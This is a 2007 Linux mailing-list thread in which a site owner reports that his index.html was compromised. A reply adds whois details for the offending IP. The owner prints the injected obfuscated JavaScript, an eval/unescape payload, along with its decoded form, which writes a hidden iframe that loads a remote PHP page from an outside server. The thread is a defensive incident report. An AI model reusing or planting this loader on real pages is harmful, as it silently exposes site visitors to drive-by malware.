[ale] I've been hacked!

Adrin adrin at bellsouth.net
Wed Nov 21 18:33:42 EST 2007 

 whois 69.73.146.142

OrgName:    Jaguar Technologies LLC 
OrgID:      JTL-8
Address:    4201 SW Freeway suite#216
City:       Houston
StateProv:  TX
PostalCode: 77027
Country:    US

NetRange:   69.73.128.0 - 69.73.191.255 
CIDR:       69.73.128.0/18 
NetName:    JAGUAR-TECHNOLOGIES-NOC
NetHandle:  NET-69-73-128-0-1
Parent:     NET-69-0-0-0-0
NetType:    Direct Allocation
NameServer: NS.NOCDIRECT.COM
NameServer: NS2.NOCDIRECT.COM
Comment:    NOCDIRECT
RegDate:    2003-11-05
Updated:    2005-04-15

RAbuseHandle: ABUSE370-ARIN
RAbuseName:   Abuse 
RAbusePhone:  +1-713-960-1502
RAbuseEmail:  abuse at jaguarpc.com 

OrgTechHandle: GL538-ARIN
OrgTechName:   Landis, Greg 
OrgTechPhone:  +1-832-279-5529
OrgTechEmail:  greg at jaguarpc.com

# ARIN WHOIS database, last updated 2007-11-20 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

I seem to recall that IIS has/had a hosting bug of some type.  From what
I remember one virtual hosting domain could infect another on the same
server.  I wish I could remember were I read about it.  I remember
mostly that is was a RED HAT hosting site that had switch to M$ because
of SCO Lawyers.



On Wed, 2007-11-21 at 06:57 -0500, Jim Lynch wrote:
> Last summer I received notification from Google that a web page on one 
> of my web hosting accounts was infected with some sort of malware bug. 
> 
> This account only has ftp access so I changed the password for the one 
> and only ftp account and removed the offending code from my index.html 
> file.  I also added a cron job to another site to compare a good 
> index.html with the one on the site that had been hacked in case they 
> came back.
> 
> They did.
> 
> Today I received a message that said the compare failed and found the 
> following at the top of the body in my index.html file:
> 
> <script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%62%37%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%36%39%2e%37%33%2e%31%34%36%2e%31%34%32%2f%7e%61%62%6f%75%6e%64%69%6e%2f%69%6d%61%67%65%73%2f%66%72%74%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%36%36%38%33%29%2b%27%61%39%62%5c%27%20%77%69%64%74%68%3d%33%35%31%20%68%65%69%67%68%74%3d%31%33%33%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); 
> </script>
> 
> That script, unescaped looks like:
> 
> window.status='Done';document.write('<iframe name=7b73 
> src=\'http://69.73.146.142/~aboundin/images/frt.php?'+Math.round(Math.random()*46683)+'a9b\' 
> width=351 height=133 style=\'display: none\'></iframe>'
> 
> Has anyone seen anything like this before?  I wonder what  sort of evil 
> function it might perform?
> 
> I also wonder how they got access the second time?  I went through the 
> cgi scripts on that system to be sure they were mine. There aren't any 
> php files on the system.
> 
> I attempted to look up the ip address but nslookup said it didn't exist, 
> however it pings and the index.html file from it is the default apache2 
> index file.  I suspect that system has been hacked as well.
> 
> Note the incident from last Summer was a different one.
> 
> Thanks,
> Jim.
> 
> 
> _______________________________________________
> Ale mailing list
> Ale at ale.org
> http://www.ale.org/mailman/listinfo/ale

More information about the Ale mailing list